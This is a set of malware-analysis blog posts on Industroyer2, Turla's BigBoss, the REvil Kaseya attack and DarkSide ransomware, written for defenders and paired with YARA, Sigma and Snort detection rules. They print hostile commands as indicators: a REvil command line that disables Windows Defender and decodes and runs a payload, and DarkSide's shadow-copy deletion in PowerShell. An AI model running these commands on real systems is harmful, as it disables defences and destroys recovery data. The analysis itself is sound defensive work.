Industroyer2: The ICS-capable malware re-emerges in order to cause critical services disruption

A few days ago a new variant of an ICS-capable malware known as Industroyer has been employed during a cyber-attack conducted against industrial control systems (ICS) responsible for the management and control of power plants subsystems in Ukraine.

This new version has been named Industroyer2 and represents the evolution of a malware family already observed in December 2016 working against similar targets. This type of attack was reported after a long series of other attacks targeting Ukrainian organizations and entities which generally involved the use of wipers, backdoors and DDoS attacks.

Its peculiarity is that it is in fact the first to have been clearly targeted ICS infrastructures and to employ ICS-capable malware.


I had a look at the file identified with the following characteristics:


This is a 37.00 Kb in size 32-bit x86 Portable Executable (PE) compiled on Wednesday 23 March 2022 10:07:29 as evidence reported following

Basically speaking, the malware is designed to read some embedded configuration entries in order to craft IEC-104 Application Service Data Unit (ASDU) messages that allow it to interact with the remote targeted units (reachable as internal IP addresses) over TCP protocol.

Taking a look at the execution flow, we can see that this piece of malware handles two optional parameters from the command line which are -t and -o as evidence from the code extraction below

-o allows to write a debug file on the filesystem (by default it’s printed on the console) while -t allows to delay execution by referencing the current SystemTime.

After parsing the parameters provided via the CLI, the malware starts to retrieve the information from the embedded configuration entries

These entries appear as the image following

Each configuration entry starts with an internal IP address (in the image above obscured in the last two octets) and a port, followed by four numbers (may be some sort of operating flags) a process name and a path (in this case D:\OIK\DevCounter).

The last chunck consists of information used to construct the message intended to be send to the ASDUs. For each of the entries found the malware goes to terminate the process PServiceControl.exe.

The process name is hardcoded within the executable.

At this point it goes to enumerate processes again in order to find the process name corresponding to the one specified in the configuration entry (PService_PPD.exe).

After recovering the path D:\OIK\DevCounter and the file name PService_PPD.exe it’s going to rename the file present under this path by adding the .MZ extension to it.

Most likely this is done to prevent any task designed for the process’s ‘always-on‘ from re-launching it. For each embedded configuration a thread is then created in order to implement IEC-104 communication protocol.

The IEC-104 extends the IEC-101 in a way that it can be transmitted over a TCP/IP network. So in each such thread the malware will attempt to communicate with the specified IP address using the protocol described in the IEC-104 standard after to have iterated through the ASDU entries in the configuration block.

In IEC-104 each object in the ASDU has an Information Object Address. Basically, the primary purpose of this action is to connect to the specified IP address and send crafted ASDU messages resulting in Information Object Address state being set to either ON or OFF.


By doing a comparative analysis of INDUSTROYER (its IEC-104 module) and INDUSTROYER2 it’s possibile to note a lot similarities above all in the operating logic despite the fact that the latest samples certainly show substantial differences if compared with 2016 ones.

Among the technical similarities at the code level it’s possibile to observe overlaps in the functions dedicated to the management, composition and control of ASDU messages.

The new executable in some cases joins together some strings in respect to previous sample optimizing in some cases the global execution process but in general the strings that refer to the debug messages are the same allowing old YARA rules to match the new sample as well.

According to the first first attribution of the family shared by ESET researchers and in the light of the further technical evidence extracted in this article, the threat in question is to be linked with the threat actor known as Sandworm (aka BlackEnergy).


I can definitely say that the Industroyer malware family is a sophisticated piece of malware used against industrial control systems (ICS). The findings reported here are in line with previous operations already attributed by the security community to Russian APT groups and to the best of my current knowledge this is the first ICS-capable malware used since the beginning of the conflict between Russia and Ukraine after a long series of attacks that have seen the use of wipers, backdoors, different early and middle-stage implants and (D)DoS attacks.

The use of this type of malware should alert about the potential of Russia-State linked APT groups to focus their efforts against industrial control systems (ICS) and their willingness to use this kind of “digital weapons” to cause disruption of critical services.

It’s important to consider the attackers could adapt this malware to other similar targets and that any intrusion against targets of this type should be considered extremely dangerous and complex to mitigate in relation to the presence of protocols born decades ago without taking the security factor into consideration.


rule Sandworm_Industroyer2_76222_00001 : RUSSIAN THREAT GROUP {
author = “Emanuele De Lucia”
description = “Strings-based threat detection rule for INDUSTROYER2”
tlp = “white”
date = “2022-04-15”
hash1 = “d69665f56ddef7ad4e71971f06432e59f1510a7194386e5f0e8926aea7b88e00”
$ = “PServiceControl.exe”
$ = “Sent=x%X | Received=x%X”
$ = “Cause: %s (x%X) | Telegram type: %s (x%X)”
$ = “Length:%u bytes | “
$ = “Unknown APDU format !!!”
$ = “%02hu:%02hu:%02hu:%04hu”
condition: (uint16(0) == 0x5a4d and all of them)

The BigBoss Rules: Something about one of the Uroburos’ RPC-based backdoors

BigBoss is one of the RPC-based backdoors used by Uroburos (aka Turla, Snake, Venomous Bear, Pacifier). It was first spotted out in 2018 and was observed to include new features in the last quarter of 2020. During operations usually it’s used in combination with R.A.T. (Remote Administration Tools) such as Kazuar and Carbon. Several months ago I had the opportunity to analyze some versions of these pieces of malware and have now decided to publish an excerpt based solely on some specific technical characteristics observed. The activity had as objective the production of detection and attribution rules one of which is shared in this post.


BigBoss implants exports basically (3) three functions. The Start() one is designed to retrieve basic information and to call sub_407E50 at 0040B0D3. First of all modulename kernel32.dll is dexored through the key 0x4d4e and an handle to kernel32.dll is obtained through GetModuleHandle. Malware writer chose to dynamically resolve certain API functions likely in order to hide information, from static analysis, about libraries and functions that are used by the implant and normally stored in IAT. In this case IsWow64Process is found through GetProcAddress to retrieve OS bitness.

Shortly after a call to sub_409C70 where the path of the .inf file is retrieved.

BigBoss writes a configuration file named backport.inf. The configuration file is written to %SystemRoot%\INF\backport.inf (as reported in screenshot above) and contains a [Version] section with various configuration entries. At this point instructions performed call the StartServiceCtrlDispatcher function in order to connect to the SCM (Service Control Manager) and start the control dispatcher thread. The dispatcher thread loops, waiting for incoming control requests for the services specified in the dispatch table.

Service name is SWCheckState. Further API functions is then dynamically resolved. One of them is CreateService retrieved even in this case through a GetProcAddress call after to have obtained an handle to advapi32.dll at sub_408790. After the service is created OpenService function is called in order to interact with the service just created and ChangeServiceConfig2W ChangeServiceConfigW are subsequently used to modified parameters of the same. Finally, StartService starts the service. In ServiceMain a RegisterServiceCtrlHandlerEx function is used to register a control handler with the control dispatcher. SetServiceStatus is called to set the status of the service and the CreateEvent function is then responsible to create the event object. 

SMB Server is then enabled by creating the RegKey HKEY_LOCAL_MACHINE “SYSTEM\\CurrentControlSet\\Services\\lanmanserver\\parameters on sub_40AB90.  Named pipes are used for interprocess communication (IPC) both locally and remotely. Access to the remote named pipes is done via SMB. RegKey HKLM\SYSTEM\CurrentControlSet\Control\LSA\Restrict Anonymous is then set to 0 in order to permit anonymous logon users can access all shared resources on a remote share

The RegKey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanServer\Parameters\NullSessionPipes is also written in order to add the following values







sub_40AAE0 is responsible for connections to remote devices via IPC$. via WNetAddConnection2

BigBoss supports connections through null sessions or via default credentials. A thread is then created having sub_408830 as StartAddress. This thread is mainly responsible to handle communications with CnC (Command and Control) server. CreateNamedPipeW and ConnectNamedPipe are used to test connection. If successfull it’s able to get additional payloads and write operation results into log files created and written under %temp% path.


BigBoss is an integral part of the Turla team’s attack and persistence suite. Its development and evolution have probably shared practices and logic with other implants linked to its main cluster such as the second stage backdoor called Carbon. For example, by analyzing both, it can be noted that it shares with it not only a partial overlap in some internal functions, as shown below

but in some cases whole code chunks having a full overlap

I based one of my hunting rules for this family on this piece of code. The rule is released in the “Detection” section




rule Turla_Code_00325_00291 {
author = “Emanuele De Lucia”
description = “Yara hunting rule for Turla shared code chunk”
hash1 = “3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122”
hash2 = “a679dbde0f4411396af54ea6ac887bd0488b2339cd8a4b509a01ca5e906f70bd”
hash3 = “c819ec7743e2f5db13f277749961dffad08dba6dd21450eea33a27403386c959”
hash4 = “7bb65fe9421af04c5546b04a93aa0e517356c0a85856f1265587983ce2bf8aef”
hash5 = “94421ccb97b784c43d92c4b1438481eee9c907db6b13f6cfc4b86a6bb057ddcd”
$hex = { 8B (4C 24 ??|55 ??) (51|52) 8D (54 24 ??|45 ??) (52|50) 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D (44 24 ??|4D ??) (50|51) 6A ?? 8D (4C 24 ??|55 ??) (51|52) 6A ?? 8D (54 24 ??|45 ??) (52|50) 8B (54 24 ??|45 ??) 6A ?? 8D (44 24 ?? | 4D ??) (50|51) 6A ?? 8D (4C 24 ??|55 ??) (51|52) 56 (52|50) FF 15 ?? ?? ?? ?? 85 C0 (0F 85 ?? ?? ?? ??|75 ??)}


Revil / Sodinokibi ransomware delivered through Kaseya VSA supply-chain attack

On July 2, 2021, Kaseya issued a notice stating that the company was experiencing a potential cyber attack against the VSA suite. The company itself advised that the on-prem customers servers should be shut down immediately until further notice from them.

VSA is a very common solution and usually used by Managed Service Providers especially in the United States and the United Kingdom. It allows to perform patch management and client monitoring for MSP customers.

From the first reconstructions of the incident, a threat actor caused the spread of malicious code together with alleged updates performing a s.c. supply-chain attack. The delivered malicious code is capable of copying a malware dropper (digitally signed with a valid signature from PB03 TRANSPORT LTD.) of the Revil / Sodinokibi ransomware on the affected systems.

As per evidence extracted, this dropper (sha1: 5162f14d75e96edb914d1756349d6e11583db0b0) has the purpose of creating two distinct files under the path C:\Windows\ . Although not common practice among malware writers, this path is hard-coded within the executable.

The creation of the aforementioned files has the purpose of side-loading a malicious dll (sha1: 656c4d285ea518d90c1b669b79af475db31e30b1) within a legitimate copy of the Microsoft Windows Defender executable (MsMpEng.exe). As soon as the latter is launched, the file encryption phase is therefore carried out through a legitimate process, complicating the detection operations.

Both payloads are retrieved by referencing two resources within the dropper, as shown in the following image

Side-Loaded DLL

The loaded dll into the legitimate Windows Defender executable is intended to perform the actual file encryption operations. The malicious Revil / Sodinokibi payload is originally retrieved after an useful key for this process is dexored at sub_10001110. The DLL exports several function: ServiceCrtMain, ServiceMain, SvchostPushServiceGlobals as evidences reported

ServiceCrtMain is the one of our interest as it is responsible for initiating the logic of retrieving and executing malicious instructions

The payload is then mapped as file into the created thread through CreateFileMappingW and MapViewOfFile.

File mapping is commonly used in order to load into memory a file and permits malware writers to manipulate it easily. CreateFileMapping function is useful to load a file into memory while MapViewOfFile function returns a pointer to the base address of the mapping. The payload is then executed. Following is reported the implant configuration file as it has been extracted in its original form:


Propagation and Related Risks

Supply chain attacks perpetrated with the aim of targeting new victims is something we are not used to see in a ransomware-related incident. This one appears however to have a big impact and certainly opens to considerations about the devastating new trend in cybercrime to study and focus on a single target only to hit hundreds or thousands of them. What must definitely be considered in this event is that the first targets are MSPs (Managed Service Providers) because, by hitting them, the attacker has the potential to further spread malicious payloads even towards their customers.


Managed Service Providers located at least in the following countries: US, DE, UK, IE according to the visibility I can dispose of at the time of writing. MSPs are generally to be considered a strategic target as they offer a direct channel to reach many other potential targets (the same MSP customers).

Indicators of Compromise / Linked Artifacts

updatename: Kaseya VSA Agent Hot-fix

filePath: c:\kworking\agent.exe

filePath: c:\kworking\agent.crt

Task commandline: C:\WINDOWS\system32\cmd.exe” /c ping -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

md5: 561cffbaba71a6e8cc1cdceda990ead4

sha1: 5162f14d75e96edb914d1756349d6e11583db0b0

sha256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

md5: a47cf00aedf769d60d58bfe00c0b5421

sha1: 656c4d285ea518d90c1b669b79af475db31e30b1

sha256: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd



The following rule can be useful to identify the Revil / Sodinokibi dropper

rule REvil_Dropper_827322_000001 {
description = “Detects REvil/Sodinokibi dropper as observed in Kaseya supply-chain attack”
author = “Emanuele De Lucia”
reference1 = “”
reference2 = “”
date = “2021-07-02”
hash1 = “d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e”
$ = “MpSvc.dll” fullword ascii
$ = “MsMpEng.exe” fullword wide
$ = “Antimalware Service Executable” fullword wide
$ = “MsMpEng.pdb” fullword ascii
$ = “SOFTIS” fullword wide
$ = “MODLIS” fullword wide
condition: uint16(0) == 0x5a4d and all of them


A possible way to get a first degree of visibility into potential events related to such threat could be to detect how the adversary tries to disable the defenses of the victim system (T1562). In particular, this allows us to observe events in which the adversary successfully disabled Windows Defender through powershell message

Get-WinEvent -LogName Microsoft-Windows-PowerShell/Operational | where {($_.message -match “.Set-MpPreference.” -and $_.message -match “.-DisableRealtimeMonitoring $true.” -and $_.message -match “.-DisableIntrusionPreventionSystem $true.” -and $_.message -match “.-DisableIOAVProtection $true.” -and $_.message -match “.-DisableScriptScanning $true.” -and $_.message -match “.-EnableControlledFolderAccess Disabled.” -and $_.message -match “.-EnableNetworkProtection AuditMode.” -and $_.message -match “.-Force -MAPSReporting Disabled.” -and $_.message -match “.-SubmitSamplesConsent NeverSend.”) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message



Ransomware: Survival vs Kill Chain.

What we today define “ransomware” at the beginning were basically screen lockers demanding a ransom from the victim (“Your PC contains illegal content and cannot be used …“).

In relation to the increasing revenues they are able to generate, in recent years they have become one of the fastest growing classes of malicious software in the cyber threat landscape.

Lately, moreover, almost all of the interventions and articles on “cyber” topics were related to this category of malware as a result of a specific attack against Colonial Pipelines Inc. which caused countless economic losses and inconveniences of any kind in the States.

In face of first rivers of ink spilled on the incident itself and then on the group responsible for the attack (- note it was one of the group’s affiliates and not the same dev team of the #DarkSide ransomware -) they are not missing, here and there, articles / advice / posts by experts on how to defend against this type of malware.

The plethora of suggestions given, however, in my opinion have rarely been placed within a strategic context and almost always indicated as a list of specific actions to be performed.

The individual items of these lists, although singularly impeccable from a theoretical point of view (such as “installing a good antivirus” and “applying risk management processes“), can be difficult to apply in practice if not placed in a well-defined context that pursue a specific purpose; this purpose should the contrast and mitigation of extortion-oriented attacks and much more generally the enhancement of one’s defensive capabilities.

Finally, considering the famous phrase – “It is not possible to be 100% protected from malicious code” – it is also clear that a valid defensive solution cannot be based exclusively on the adoption of the latest AV / EDR technologies (more or less sophisticated) nor much less on tricks and / or tips of the last minute.

Survival Skills:

Implementing a good defense program against these threats is undoubtedly an active and continuous process over time that involves the strengthening of at least five (5) internal capabilities.

They are:

Prevention: prevent the exploitation of infrastructure weaknesses and / or vulnerabilities through processes for updating, hardening and control of public information (social networks, public managers / employees profiles, job descriptions …) Technically speaking, in some cases, prevention could also mean adopting alternative technologies to those already in place and normally used, for example, for remote access services (VPN / RDP) in order to totally eliminate the growing risks due to the greater attention of criminal groups against them (0day research, 1 day exploit and theft / sale of access credentials on clearnet / darknet). Their potential compromise, in fact, could be catastrophic for the environment to be protected and provide an advantage that is difficult to recover on a defensive level as these services are often designed to interface directly with corporate intranets.

Detection and Protection: represents the ability to protect your assets from potentially adverse events by acquiring the ability to detect and contain a threat. As for the malicious code, the protection of your assets certainly includes the adoption of an AV / EDR, execution prevention systems, sandboxes etc.etc.

Resistance: indicates the ability to face and / or minimize the effects of an unknown or particularly stealthy threat and which has a high possibility of representing a concrete risk. It involves the implementation of concepts such as the separation of environments, the reduction of the potential attack surface, the identification of critical services and more stringent access control to them, etc. etc.

Resilience: indicates the ability to recover after an accident. Knowledge (SA – Situational Awareness): it means clearly understanding what to defend against in relation to our perimeter as well as the tactics and procedures implemented by the opponents and the consequent adoption of a defense strategy.

Knowledge (SA – Situational Awareness): it means clearly understanding what one must defend against in relation to our perimeter as well as the tactics and procedures implemented by the adversaries and a consequent adoption of a defense strategy.

Ransomware…pays off:

The Covid-19 pandemic has been very useful for the “ransomware” business. In general the higher revenues of many criminal groups (tripled, according to some estimates, compared to the pre-covid period) are due to the inability of many organizations to adapt to a de-centralized work model after a large percentage of their the workforce begun to operate outside a defined perimeter (the classic corporate one).

However, in many cases, it should be noted that the extension of the attack surface as a direct consequence of the new “smart-workers” not actually created a “new” problem from scratch but has often magnified one that was present even previously. This problem is mainly due to the lack of equipment (not only in the technological field but also in the procedural and internal policies ones) with which many companies fight these threats.

The most typical and widespread weakness observed during the analysis of some incidents was to focus (or limit) these defense on few points compared to the five (5) listed above. Closely related to what the “classic” cyber-security industry proposes, very often the one and only line of defense is delegated to AntiVirus / EDR and “Monitoring Operations“, thus concentrating all the contrast strategy in the already described capacity of “Detection and Protection“.

In consideration of the fact that even the most modern anti-malware solutions available on the market cannot guarantee detection rates even close to 100% (without considering the context on the basis of which an adversary arrives to operate within our perimeter) itìs evident that relying exclusively on them may not be enough.

Survival vs Kill Chain:

All the intrusions that arrive at a ransom request have effectively closed the so-called “Kill-chain”. The kill-chain virtually represents a series of steps (or rings), precisely, concatenated, and in general, simplifying, they are:

1. Information gathering

2. First access and early-stage payload delivery

3. Lateral movement

4. Late-stage payload delivery

Closing this chain often means, for the victim, having to pay an expensive ransom to get back its data and documents. An effective contrast strategy will therefore provide for the direct mitigation of the potential risks deriving from each single phase (or ring) of this kill-chain, directing, with a more strategic vision, one’s work towards the five (5) points identified before.

Information Gathering: In this phase, attackers seek and hunt potential victims by acquiring information about them. While only some time ago the approach to choice seemed to be quite casual and a direct consequence of the general external posture of the organization to hit (in the sense that robbing a shop is generally easier than robbing a bank) now the trend seems to be moving towards a much more targeted decision, so as to be able to ask for very substantial ransoms once the operation succeed. Under the heading of “Prevention“, fall the set of activities aimed at not exposing the side to such attacks by trying to contain the information released (voluntarily or not) on social networks and public profiles of the company. In this regard, Security Awareness programs are particularly useful. Information sources (threat intelligence) designed to increase the levels of Situational Awareness of the staff in charge of network protection can also be particularly useful.

First Access / Early-Stage payload delivery: In this phase, the attacker is able to obtain a first access to the perimeter. In order to make their life as difficult as possible it is necessary to correctly apply hardening and patching programs to the systems. Technically limiting the potential attack surface, applying multiple authentication systems, blocking the execution of macros and scripting languages ​​that are not strictly necessary, checking permissions, logically limiting the communications of internal workstations are all useful factors for an Incident Prevention strategy. If the attacker still manages to deliver a first-stage payload and therefore to obtain a first access to our infrastructure, the adoption of policies aimed at obtaining greater visibility regarding what is happening (for example: alerts on login credentials anomalies, alerts on changes to accounts in the AD – Active Directory -, alerts on malicious DNS resolutions, alerts on network flow anomalies – Firewall Logs -, alerts on IDS / IPS events and so on…) is useful to strengthen our Detection and Protection skills. EDR / AV and SIEM support these skills as well.

Lateral movement: In this phase, the attacker managed to effectively compromise one or more machines inside our infrastructure and aims at expanding his/her control. If the defenses put in place up to now have proved ineffective, a further protective barrier capable of mitigating what is in place could be represented by the application of strong network segmentation policies of the environments. A further critical factor that can significantly increase our Resistance skills is the application of Behavior Analytics Systems.

Late-stage payload delivery: If the strategies applied so far have proved particularly ineffective in combating a so advanced and persistent adversary, we could suffer the effects of the last phase of a ransomware-kill-chain, that is the release of the last stage payload, the one that will probably be in charge of encrypting our data and information. Most likely the attacker already got the full control of several internal machines and probably also obtained “admingrade” credentials. Based on my personal experience, therefore, if we are at this point there is little chance that the Detection and Protection systems can effectively mitigate the course of events. The best defense at this point is to have a good backup of all data, files, applications and any other critical resources. These backups must obviously be isolated from other systems.


The ransomware business is particularly profitable. Considering the revenues it generates, it’s possible to assume possible to assume much more frequent and sophisticated attacks. The application of defensive measures in the various stages of the kill-chain, however, can reduce the risk of a full data loss (and to rely exclusively on negotiations with criminals to recover them).


Affiliates vs Hunters: Fighting the “DarkSide”

This content was originally written by me for SOC Prime, Inc. You can view the original article with detection rules here or read on for a local version.


On August 2020 a new type of malware, belonging to the Ransomware category, appeared in the cyber threat landscape. Threat actor responsible for its development called it “DarkSide” and , like others piece of malware of this type, is operated in Big Game Hunting (BGH) campaigns. Around more or less the same time, a DLS (Dedicated Leak Site) was made available on the darkweb (behind the TOR network) in order to report the first victims.

On their DLS, DarkSide operators claimed to be experienced in conducting cyber operations, having previously used other , not better identified, ransomware variants. Indeed, some characteristics of their operations support the hypothesis that the group could be a former affiliate of some other R-a-a-S (Ransomware as a Service) program that chosen to write their own ransomware likely to avoid sharing the profits of criminal activities with third parties.


DarkSide is a well-written malware family not much changed if compared to the first versions analyzed. Usually the samples belonging to this family present, as already reported in other technical tearticles, some functionalities aimed at making the analysis more harder. Indeed, in a recent sample (sha256:17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61), at 0040182A we find a sub aimed at dynamically resolving DLLs and API through LoadLibrary / GetProcAddress. sub_4016D5, sub_4013DA and sub_401AC3 are also involved in this process. The following screenshot shows a chunk of code extracted from the whole function designed for this purpose:

This can be an useful place to create a code-chunck based Yara rule aimed at hunting further variants of the same malware family. After having selected two representative chuncks we can obtain something similar to the following:

rule DarkSide_Ransomware_827333_39928 : CRIMEWARE {
author = “Emanuele De Lucia”
description = “Detects possible variants of DarkSide ransomware”
hash1 = “17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61”
call 0x4016d5
push esi
call 0x408195
mov ebx, eax
push dword ptr [esi – 4]
push esi
call 0x4013da
mov eax, dword ptr [esi – 4]
lea esi, [esi + eax]
mov ecx, 0x23
$ = { E8 [4] 56 E8 [4] 8B D8 FF 76 ?? 56 E8 [4] 8B 46 ?? 8D 34 06 B9 ?? ?? ?? ?? }
any of them

Darkside employs also techniques for privilege escalation and UAC (User Access Control) bypass. The technique observed in this case is known as CMSTPLUA UAC Bypass and exploits the ShellExec function by CMSTPLUA COM interface {3E5FC7F9-9A51-4367-9063-A120244FBEC7}. This allow to start a process with elevated permissions, according to the following graph:

Powershell is used in order to delete shadow copies preventing the recovery of previously backed up files through them according to the following syntax:

powershell -ep bypass -c
.Substring(2*$_,2))};iex $s”
Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

In this case, a quick Sigma rule, can be employed in order to hunt for similar systems-side behaviors.

title: Detects possible DarkSide infection through PowerShell cmdline used to delete Shadow copies
status: stable
description: Detects possible DarkSide infection through PowerShell cmdline used to delete Shadow copies
author: Emanuele De Lucia
– internal research
– attack.t1086
– attack.t1064
date: 2020/12/01
category: process_creation
product: windows
– ‘\powershell.exe’
– ‘(0..61)|%%{$s+=[char][byte]’
– ‘4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20’
condition: selection
level: high

Before executing the main payload, the sample performs several other activities like information gathering (f.e. get Disks Info)

This image has an empty alt attribute; its file name is immagine-2.png

and a comparison of system services with a predefined list to stop those services that could affect the file encryption process

The following are the services malware looks for:


These areas can likewise be considered in order to extract bad-known pieces of code:

rule DarkSide_Ransomware_827333_39929 : CRIMEWARE {
author = “Emanuele De Lucia”
description = “Detects possible variants of DarkSide ransomware”
hash = “17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61”
push 0x10020
push dword ptr [edi]
push dword ptr [ebp – 4]
call dword ptr [0xcf0e66]
mov dword ptr [ebp – 8], eax
cmp dword ptr [ebp – 8], 0
je 0xce4d83
push 0x1c
lea eax, [ebp – 0x30]
push eax
call 0xce13da
lea eax, [ebp – 0x30]
push eax
push 1
push dword ptr [ebp – 8]
call dword ptr [0xcf0e6a]
push dword ptr [ebp – 8]
call dword ptr [0xcf0e6e]
$ = {68 [4] FF 37 FF 75 ?? FF 15 [4] 89 45 ?? 83 7D [2] 74 ?? 6A ?? 8D 45 ?? 50 E8 [4] 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 [4] FF 75 ?? FF 15 ?? ?? ?? ??}
any of them

After the encryption phase, Darkside is designed to communicate to its command and control server in order to share details relating to the victim (victimID) as well as further parameters useful for recovering encrypted files and identifing the affiliate. Most probably these network capabilities have been added in order to support the R-a-a-S model. In the analyzed sample, the CnC (Command and Control) is attested over the domain name Detecting network activities potentially related to this threat could therefore involve writing SNORT rules similar to the following:

alert udp $HOME_NET any -> any 53 (msg:”DNS request for a blacklisted domain ‘'”; content:”|0f|securebestapp20|03|com|00|”;nocase; reference:url,; sid:[SID HERE]; rev:1;)

This domain name has been created on 16/09/2020 and, according to my visibility, at time of writing it has an history of two (2) A record associated. The interesting one is linked to the IP Could be interested to note that the pDNS count value for this domain name from 21/09/2020 (day of first observed resolution to to 05/01/2021 (day of last observed resolution to is less than 180 and that most of them occurred from early November until today. This suggest a growth of the spread and obviously of the R-a-a-S business as well. In general, moreover, this number is also consistent with the low overall volume of DarkSide campaigns observed at least until mid-November 2020. This is further confirmed by the payload-side visibility I can dispose of for this malware family. Following are shown detection hits for DarkSide malfamily up to December 2020:

Welcome to Darkside

On 11/10/2020 a user posted an announcement titled “[Affiliate Program] Darkside Ransomware” on a Russian-speaking darkweb forum. The text contained in that post officially started the project’s affiliate program. Press articles has been used in order to advertise the program itself as well as the skills of the group that are “aimed only at large corporations” as originally posted by threat actor itself:

In the affiliate program are not welcome, among others, English speaking personalities, employees of the secret service, security researchers, the greedy (at least so I seem to understand) etc.etc.

There are, moreover, some rules to be respected, like avoiding to target entities within countries belonging to the CIS (Содружество Независимых Государств), including Georgia and Ukraine, or those operating in education, medicine, public and non-profit sector.

As you might imagine for any other job, there is a selection to go through in order to be included in the program. This includes an interview to check the candidate’s skills and experiences, such having been affiliated with some other program previously.

The group offers a Windows and Linux version of DarkSide ransomware plus an admin panel, a leak site and a CDN system for data storage.

So, do you have ESXi ?

At the end of November 2020, a Linux variant (ELF64) of DarkSide ransomware was uploaded to a well-known online malware repository. It had a detection rate, at the time of upload, practically non-existent. Even at time of writing (Jan 2021) the detection rate is very low (2/63). It seems to have a quite different purpose respect to the Windows counterpart. While the latter is born to encrypt all user files on a workstation (documents, images, PDFs and so on…), the Linux version has been created to damage virtual machines on servers. Indeed, the samples looks for extensions related to VMWare files like .vmdk, .vmem, .vswp and generic logs formats.

The ransom note is similar to the Windows one

and the output of the executable, once launched, confirms the focus on ESXi environments

as /vmfs/volumes/ is the default location of ESXi virtual machines.

A strict Yara rule similar to the following can help in identifying Linux variants of DarkSide :

rule DarkSide_Ransomware_827333_39930 : CRIMEWARE {
author = “Emanuele De Lucia”
description = “Detects possible variants of Linux DarkSide ransomware variants”
hash1 = “da3bb9669fb983ad8d2ffc01aab9d56198bd9cedf2cc4387f19f4604a070a9b5”
$ = “vmdk,vmem,vswp,log” fullword ascii
$ = “XChaCha20” fullword ascii
$ = “Partial File Encryption Tool” fullword ascii
$ = “main.log” fullword ascii
(uint16(0) == 0x457f and all of them)

Also for the Linux version, communications to the outside world take place through the same domain name previously reported and a specially crafted URL for each victim. Through Sigma it’s possible to write rules aimed at detecting DNS resolution requests to domain name where actually the command and control is attested:

title: Detects resolution requests to DarkSide Command and Control domain name
status: stable
description: Detects resolution requests to DarkSide Command and Control domain name
author: Emanuele De Lucia
date: 2020/12/01
– attack.t1071.001
category: dns
– ‘’
condition: selection
– internal research
level: high

Adversary Profile

From mid-November 2020, following the affiliation program, it’s currently more difficult to associate the exclusive use of DarkSide ransomware to a specific threat actor. However, some similarities with Revil suggest that its developer may be familiar with this solution until speculating that it may be from a former Revil affiliate who, to have more control over the operations and not to divide the profits, launched his own project, further enhanced by an independent affiliate program.

Regardless the specific actor behind the operations, DarkSide can be delivered via several vectors usually after gathering information about the target. According to my visibility, at least one threat actor who used DarkSide adopted the phishing technique (T1566) in order to deliver a first-stage payload whose exploitation finally allowed the distribution of DarkSide variants within the victim environment. Other intrusion techniques involve exploiting vulnerabilities in exposed applications (T1190) in order to get a first foothold from which to perform lateral movements.


T1190AccessAdversaries may attempt to take advantage of a weakness in an Internet-facing application using software, data, or commands in order to cause unintended or unanticipated behavior.
T1566AccessAdversaries may send phishing messages to gain access to victim systems.
T1059.001ExecutionAdversaries may abuse PowerShell commands and scripts for execution.

ExecutionAdversaries may abuse VBS scripts in order to perform tasks on the victim’s machine.
T1548.002Privilege EscalationAdversaries bypass UAC mechanisms to elevate privileges on system.
T1218.003Defense EvasionAdversaries abuse CMSTP to proxy execution of malicious code.
T1140 Defense EvasionAdversaries uses obfuscated files or information to hide artifacts of an intrusion from analysis.
T1083DiscoveryAdversaries enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
T1057DiscoveryAdversaries attempt to get information about
running processes on a system.
T1071.001Command and ControlAdversaries may communicate using application layer protocols associated with web traffic.
T1486ImpactAdversaries encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources.
T1489ImpactAdversaries stop or disable services on a system to render those services unavailable.

Indicators of Compromise